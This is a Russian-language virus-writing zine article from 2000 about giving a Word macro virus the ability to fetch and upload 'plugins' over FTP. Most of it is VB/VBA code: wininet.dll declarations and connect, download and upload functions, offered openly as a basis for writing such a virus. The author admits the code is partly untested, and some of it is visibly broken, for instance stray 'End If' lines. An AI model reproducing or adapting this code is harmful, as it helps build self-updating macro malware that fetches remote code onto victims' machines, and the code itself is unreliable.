![]() |
![]() |
![]() |
В этой статье я попробую рассказать - о подкачке вирусом дополнений из интернета для макро зверей... Всего несколько метавирусов были выпущенны на свет, вирумакеры не стали писать таких вирей из того что это давольно геморно. Я тоже не смог написать такой вирус на asm один, и я решил написать этот вирус с маленьким составом. При написание такого вируса я подумал а почему на асме? и только для win32, и выпив пивка я решил написать макро вирус с подкачкой. Мне хотелось что нибудь оригинальное и я решил сделать это через FTP. Писал я это пока пиво не закончилось, тут описан маленький кусок алгоритма. Это просто первая папыика написать вирус под w0rd с плагинами. ULTRAS[MATRiX] (c) 2000 Начало кода ~~~~~~~~~~~ Этот метод использует windoze api. 'типа windozeAPI: download virus plugin Private Declare Function FtpGetFile Lib "wininet.dll" Alias "FtpGetFileA" _ (ByVal hftpSession As Long, _ ByVal lpszRemoteFile As String, _ ByVal lpszNewFile As String, _ ByVal fFailIfExists As Boolean, _ ByVal dwFlagsAndAttributes As Long, _ ByVal dwFlags As Long, _ ByVal dwContext As Long) _ As Boolean 'типа windozeAPI: download virus plugin Private Declare Function FtpPutFile Lib "wininet.dll" Alias "FtpPutFileA" _ (ByVal hftpSession As Long, _ ByVal lpszLocalFile As String, _ ByVal lpszRemoteFile As String, _ ByVal dwFlags As Long, _ ByVal dwContext As Long) _ As Boolean ' возможно эти api понадобиться вам в вирусе Private Declare Function FtpSetCurrentDirectory Lib "wininet.dll" _ Alias "FtpSetCurrentDirectoryA" _ (ByVal hftpSession As Long, _ ByVal lpszDirectory As String) _ As Boolean Private Declare Function FtpGetCurrentDirectory Lib "wininet.dll" _ Alias "FtpGetCurrentDirectoryA" _ (ByVal hftpSession As Long, _ ByVal lpszCurrentDirectory As String, _ lpdword As Long) _ As Boolean Private Declare Function InternetOpen _ Lib "wininet.dll" _ Alias "InternetOpenA" _ (ByVal sAgent As String, _ ByVal lAccessType As Long, _ ByVal sProxyName As String, _ ByVal sProxyBypass As String, _ ByVal lFlags As Long) _ As Long ' всякое дерьмо, константы Private Const INTERNET_OPEN_TYPE_PRECONFIG As Long = 0 Private Const INTERNET_OPEN_TYPE_DIRECT As Long = 1 Private Const INTERNET_OPEN_TYPE_PROXY As Long = 3 Private Const INTERNET_INVALID_PORT_NUMBER As Long = 0 Private Const FTP_TRANSFER_TYPE_ASCII As Long = &H1 Private Const FTP_TRANSFER_TYPE_BINARY As Long = &H2 Private Const INTERNET_FLAG_PASSIVE As Long = &H8000000 Private Declare Function InternetConnect _ Lib "wininet.dll" _ Alias "InternetConnectA" _ (ByVal hInternetSession As Long, _ ByVal sServerName As String, _ ByVal nServerPort As Integer, _ ByVal sUsername As String, _ ByVal sPassword As String, _ ByVal lService As Long, _ ByVal lFlags As Long, _ ByVal lContext As Long) _ As Long Private Const INTERNET_ERROR_BASE = 12000 Private Const ERROR_INTERNET_OUT_OF_HANDLES As Long = (INTERNET_ERROR_BASE + 1) Private Const ERROR_INTERNET_TIMEOUT As Long = (INTERNET_ERROR_BASE + 2) Private Const ERROR_INTERNET_EXTENDED_ERROR As Long = (INTERNET_ERROR_BASE + 3) Private Const ERROR_INTERNET_INTERNAL_ERROR As Long = (INTERNET_ERROR_BASE + 4) Private Const ERROR_INTERNET_INVALID_URL As Long = (INTERNET_ERROR_BASE + 5) Private Const ERROR_INTERNET_UNRECOGNIZED_SCHEME As Long = (INTERNET_ERROR_BASE + 6) Private Const ERROR_INTERNET_NAME_NOT_RESOLVED As Long = (INTERNET_ERROR_BASE + 7) Private Const ERROR_INTERNET_PROTOCOL_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 8) Private Const ERROR_INTERNET_INVALID_OPTION As Long = (INTERNET_ERROR_BASE + 9) Private Const ERROR_INTERNET_BAD_OPTION_LENGTH As Long = (INTERNET_ERROR_BASE + 10) Private Const ERROR_INTERNET_OPTION_NOT_SETTABLE As Long = (INTERNET_ERROR_BASE + 11) Private Const ERROR_INTERNET_SHUTDOWN As Long = (INTERNET_ERROR_BASE + 12) Private Const ERROR_INTERNET_INCORRECT_USER_NAME As Long = (INTERNET_ERROR_BASE + 13) Private Const ERROR_INTERNET_INCORRECT_PASSWORD As Long = (INTERNET_ERROR_BASE + 14) Private Const ERROR_INTERNET_LOGIN_FAILURE As Long = (INTERNET_ERROR_BASE + 15) Private Const ERROR_INTERNET_INVALID_OPERATION As Long = (INTERNET_ERROR_BASE + 16) Private Const ERROR_INTERNET_OPERATION_CANCELLED As Long = (INTERNET_ERROR_BASE + 17) Private Const ERROR_INTERNET_INCORRECT_HANDLE_TYPE As Long = (INTERNET_ERROR_BASE + 18) Private Const ERROR_INTERNET_INCORRECT_HANDLE_STATE As Long = (INTERNET_ERROR_BASE + 19) Private Const ERROR_INTERNET_NOT_PROXY_REQUEST As Long = (INTERNET_ERROR_BASE + 20) Private Const ERROR_INTERNET_REGISTRY_VALUE_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 21) Private Const ERROR_INTERNET_BAD_REGISTRY_PARAMETER As Long = (INTERNET_ERROR_BASE + 22) Private Const ERROR_INTERNET_NO_DIRECT_ACCESS As Long = (INTERNET_ERROR_BASE + 23) Private Const ERROR_INTERNET_NO_CONTEXT As Long = (INTERNET_ERROR_BASE + 24) Private Const ERROR_INTERNET_NO_CALLBACK As Long = (INTERNET_ERROR_BASE + 25) Private Const ERROR_INTERNET_REQUEST_PENDING As Long = (INTERNET_ERROR_BASE + 26) Private Const ERROR_INTERNET_INCORRECT_FORMAT As Long = (INTERNET_ERROR_BASE + 27) Private Const ERROR_INTERNET_ITEM_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 28) Private Const ERROR_INTERNET_CANNOT_CONNECT As Long = (INTERNET_ERROR_BASE + 29) Private Const ERROR_INTERNET_CONNECTION_ABORTED As Long = (INTERNET_ERROR_BASE + 30) Private Const ERROR_INTERNET_CONNECTION_RESET As Long = (INTERNET_ERROR_BASE + 31) Private Const ERROR_INTERNET_FORCE_RETRY As Long = (INTERNET_ERROR_BASE + 32) Private Const ERROR_INTERNET_INVALID_PROXY_REQUEST As Long = (INTERNET_ERROR_BASE + 33) Private Const ERROR_INTERNET_NEED_UI As Long = (INTERNET_ERROR_BASE + 34) Private Const ERROR_INTERNET_HANDLE_EXISTS As Long = (INTERNET_ERROR_BASE + 36) Private Const ERROR_INTERNET_SEC_CERT_DATE_INVALID As Long = (INTERNET_ERROR_BASE + 37) Private Const ERROR_INTERNET_SEC_CERT_CN_INVALID As Long = (INTERNET_ERROR_BASE + 38) Private Const ERROR_INTERNET_HTTP_TO_HTTPS_ON_REDIR As Long = (INTERNET_ERROR_BASE + 39) Private Const ERROR_INTERNET_HTTPS_TO_HTTP_ON_REDIR As Long = (INTERNET_ERROR_BASE + 40) Private Const ERROR_INTERNET_MIXED_SECURITY As Long = (INTERNET_ERROR_BASE + 41) Private Const ERROR_INTERNET_CHG_POST_IS_NON_SECURE As Long = (INTERNET_ERROR_BASE + 42) Private Const ERROR_INTERNET_POST_IS_NON_SECURE As Long = (INTERNET_ERROR_BASE + 43) Private Const ERROR_INTERNET_CLIENT_AUTH_CERT_NEEDED As Long = (INTERNET_ERROR_BASE + 44) Private Const ERROR_INTERNET_INVALID_CA As Long = (INTERNET_ERROR_BASE + 45) Private Const ERROR_INTERNET_CLIENT_AUTH_NOT_SETUP As Long = (INTERNET_ERROR_BASE + 46) Private Const ERROR_INTERNET_ASYNC_THREAD_FAILED As Long = (INTERNET_ERROR_BASE + 47) Private Const ERROR_INTERNET_REDIRECT_SCHEME_CHANGE As Long = (INTERNET_ERROR_BASE + 48) Private Const ERROR_INTERNET_DIALOG_PENDING As Long = (INTERNET_ERROR_BASE + 49) Private Const ERROR_INTERNET_RETRY_DIALOG As Long = (INTERNET_ERROR_BASE + 50) Private Const ERROR_INTERNET_HTTPS_HTTP_SUBMIT_REDIR As Long = (INTERNET_ERROR_BASE + 52) Private Const ERROR_INTERNET_INSERT_CDROM As Long = (INTERNET_ERROR_BASE + 53) ' FTP API Errors Private Const ERROR_FTP_TRANSFER_IN_PROGRESS As Long = (INTERNET_ERROR_BASE + 110) Private Const ERROR_FTP_DROPPED As Long = (INTERNET_ERROR_BASE + 111) Private Const ERROR_FTP_NO_PASSIVE_MODE As Long = (INTERNET_ERROR_BASE + 112) ' Number of the TCP/IP port on the server to connect to. Private Const INTERNET_DEFAULT_FTP_PORT As Long = 21 Private Const INTERNET_DEFAULT_GOPHER_PORT As Long = 70 Private Const INTERNET_DEFAULT_HTTP_PORT As Long = 80 Private Const INTERNET_DEFAULT_HTTPS_PORT As Long = 443 Private Const INTERNET_DEFAULT_SOCKS_PORT As Long = 1080 Private Const INTERNET_OPTION_CONNECT_TIMEOUT As Long = 2 Private Const INTERNET_OPTION_RECEIVE_TIMEOUT As Long = 6 Private Const INTERNET_OPTION_SEND_TIMEOUT As Long = 5 Private Const INTERNET_OPTION_USERNAME As Long = 28 Private Const INTERNET_OPTION_PASSWORD As Long = 29 Private Const INTERNET_OPTION_PROXY_USERNAME As Long = 43 Private Const INTERNET_OPTION_PROXY_PASSWORD As Long = 44 Private Const INTERNET_SERVICE_FTP As Long = 1 Private Const INTERNET_SERVICE_GOPHER As Long = 2 Private Const INTERNET_SERVICE_HTTP As Long = 3 Private Const INTERNET_FLAG_RELOAD As Long = &H80000000 Private Const INTERNET_FLAG_KEEP_CONNECTION As Long = &H400000 Private Const INTERNET_FLAG_MULTIPART As Long = &H200000 Private Const GENERIC_READ As Long = &H80000000 Private Const GENERIC_WRITE As Long = &H40000000 Private Declare Function FtpOpenFile _ Lib "wininet.dll" _ Alias "FtpOpenFileA" _ (ByVal hftpSession As Long, _ ByVal sFileName As String, _ ByVal lAccess As Long, _ ByVal lFlags As Long, _ ByVal lContext As Long) _ As Long Private Declare Function FtpDeleteFile _ Lib "wininet.dll" _ Alias "FtpDeleteFileA" _ (ByVal hftpSession As Long, _ ByVal lpszFileName As String) _ As Boolean Private Declare Function _ InternetCloseHandle _ Lib "wininet.dll" _ (ByVal hInet As Long) _ As Integer ' Private variables to support class properties Private u_strProxyString As String Private u_lngSessionHandle As Long Private u_lngConnectionHandle As Long Private u_fSessionActive As Boolean Private u_strUserName As String Private u_strPassword As String Private u_strServer As String Private u_lngTransferType As Long Private u_strLastDLLError As String 'Функуция Connect FTP server Public Function Connect() As Boolean ' Comments : Функуция Connect FTP server ' Returns : True если удачно, False хрен Dim fConnected As Boolean On Error GoTo errorz u_fSessionActive = False u_lngSessionHandle = 0 u_lngConnectionHandle = 0 u_strServer = txtServer ' адрес сервера u_strUserName = txtUserName ' имя пользователя u_strPassword = txtPassword ' пароль u_lngConnectionHandle = InternetConnect(u_lngSessionHandle, u_strServer, _ INTERNET_INVALID_PORT_NUMBER, u_strUserName, u_strPassword, _ INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0) GetDLLError ' Проверяем что нам возратилось If u_lngConnectionHandle <> 0 Then ' Мы активны!!! fConnected = True u_fSessionActive = True Else fConnected = False End If End If End If End If _ret: Connect = fConnected Exit Function errorz: MsgBox "Ошибка" resume _ret End Function 'Функуция Disconnect FTP server Public Sub Disconnect() On Error GoTo errorz ' Дисконект только если мы подключены к FTP If u_lngConnectionHandle <> 0 Then ClearDLLError ' Закроем наш конект InternetCloseHandle u_lngConnectionHandle ' Сохраним ошибку GetDLLError ' Восстановите connhandle u_lngConnectionHandle = 0 ' Поменяем метку u_fSessionActive = False End If _ret: Exit Sub errorz: MsgBox "Ошибка" Resume _ret End Sub Private Sub ClearDLLError() u_strLastDLLError = "" End Sub Private Sub GetDLLError() On Error GoTo errorz u_strLastDLLError = Err.LastDLLError _ret: Exit Sub errorz: MsgBox "Ошибка" Resume _ret End Sub Public Function OpenSession() As Boolean ' Comments : Открывает сеанс в ресурс Interenet(FTP) ' Returns : True if the session opened succesfully, False otherwise Dim fOpened As Boolean On Error GoTo errorz ' ОПЗ... fOpened = False ClearDLLError If u_strProxyString = "" Then u_lngSessionHandle = InternetOpen(mcstrUserAgent, INTERNET_OPEN_TYPE_DIRECT, _ vbNullString, vbNullString, 0) Else u_lngSessionHandle = InternetOpen(mcstrUserAgent, INTERNET_OPEN_TYPE_PROXY, _ u_strProxyString, vbNullString, 0) End If GetDLLError fOpened = (u_lngSessionHandle <> 0) _ret: OpenSession = fOpened Exit Function errorz: MsgBox "Ошибка" Resume _ret End Function 'Закачка файла aka Download plugin Public Function GetFile( _ strRemoteFile As String, _ strLocalFile As String) _ As Boolean ' Comments : Download plugin ' Parameters: strRemoteFile - Path и имя файла в сервере FTP ' strLocalFile - Path имя файла куда записывать клиенту ' Returns : True если удачно, False хрен Dim fRetval As Boolean Dim strFileOnRemote As String Dim strDirOnRemote As String On Error GoTo errorz ' Проверим мы в FTP If u_fSessionActive Then ' Проверка имен файлов If strRemoteFile <> "" And strLocalFile <> "" Then ' Получим name/path strDirOnRemote = GetPathFromFTPPath(strRemoteFile) strFileOnRemote = GetNameFromFTPPath(strRemoteFile) ' Измените директорий в remote сервере RemoteChDir strDirOnRemote ClearDLLError ' Воаля fRetval = FtpGetFile(u_lngConnectionHandle, strFileOnRemote, _ strLocalFile, False, FILE_ATTRIBUTE_NORMAL, _ INTERNET_FLAG_RELOAD Or u_lngTransferType, 0) GetDLLError End If End If _ret: GetFile = fRetval Exit Function errorz: MsgBox "Ошибка" Resume _ret End Function 'Upload plugin Public Function PutFile( _ strLocalFile As String, _ strRemoteFile As String) _ As Boolean ' Comments : Upload plugin ' Parameters: strLocalFile - path и имя текущего файла ' strRemoteFile - path и имя текущего файла ' Returns : True если удачно, False хрен ' Dim fRetval As Boolean Dim strFileOnRemote As String Dim strDirOnRemote As String Dim strFileOnLocal As String Dim strTmp As String On Error GoTo errorz ' Проверим мы в FTP If u_fSessionActive Then ' Проверка имен файлов If strLocalFile <> "" And strRemoteFile <> "" Then ' Parse file names strTmp = strRemoteFile strDirOnRemote = Right(strTmp, Len(strTmp) - Len(u_strServer)) strFileOnRemote = strRemoteFile strFileOnLocal = strLocalFile ' Проверка корневой диры If (strDirOnRemote = "") Then strDirOnRemote = "/" End If ' поменяем директорию на ftp какая нам нужна RemoteChDir strDirOnRemote ClearDLLError ' Посылаем файл на FTP fRetval = FtpPutFile(u_lngConnectionHandle, strFileOnLocal, _ strFileOnRemote, u_lngTransferType, 0) ' Проверка на глюки GetDLLError End If End If _ret: PutFile = fRetval Exit Function errorz: MsgBox "Ошибка" Resume _ret End Function Ну вот и все правдо может я параметры некоторые не написал влом мне проверять, пиво закончилось.. Некоторые опций я не описал типа FtpSetCurrentDirectory там и так все ясно, короче идея есть немного кода есть хватит чтобы чтонибудь написать.... Некоторые параметры придется изменить так как писал я не в ворде a в VB 6.0. Могут быть глюки, они и у меня были потому что я не все до конца отладил, но все таки это работало. Just do it... L0rd Ultra (с) 2000 |
||
![]() |
![]() |
![]() |